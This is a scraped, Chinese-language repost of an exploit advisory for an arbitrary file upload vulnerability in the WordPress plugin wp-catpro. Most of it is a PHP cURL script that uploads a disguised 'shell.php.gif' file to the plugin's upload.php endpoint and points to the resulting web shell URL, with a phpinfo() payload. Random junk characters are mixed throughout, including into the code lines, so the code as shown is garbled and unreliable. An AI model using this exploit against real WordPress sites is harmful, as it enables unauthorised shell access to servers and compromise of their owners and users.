WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
. x7 O* s! S0 U# U5 T/ [
8 M4 u+ t7 q3 }5 K! Q% k作者  => Zikou-16
2 Z- Y& c# _) n+ B; D  {邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
* t2 p8 S. n9 {下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
+ d1 e( X# M3 G  ~* \- ~####
* \1 y5 D9 I3 I5 C& {* s1 d
* _$ i' {/ H2 k6 F- x' g3 R6 v#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
& ?* s4 E# P; @# j$ {# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
2 Q( s& A( L2 E# ^5 G' E# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
7 m* W5 B$ G* [+ [! w. d9 r: y------------------
& q% Y& L% j9 u
#=> Exploit
-----------
<?php
6 }+ g* m4 l+ Q/ ?; l2 @5 p5 s3 `
/ T$ n# B3 w$ T; q1 y; W$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
! g2 }3 p3 @- ?& f0 v+ mcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
! G7 o+ D3 w$ a0 o5 R1 T# lcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
. J/ R4 ]" n% V. U1 z$postResult = curl_exec($ch);
! X- n9 F. K/ V! _4 p( ^& ~' lcurl_close($ch);

, s! p* _2 D! `7 Q+ Vprint "$postResult";
% @. l$ q, F- n% y% G
! q* R& y. j; l9 {+ HShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
5 [6 M) a8 U# F: }( _phpinfo();
?>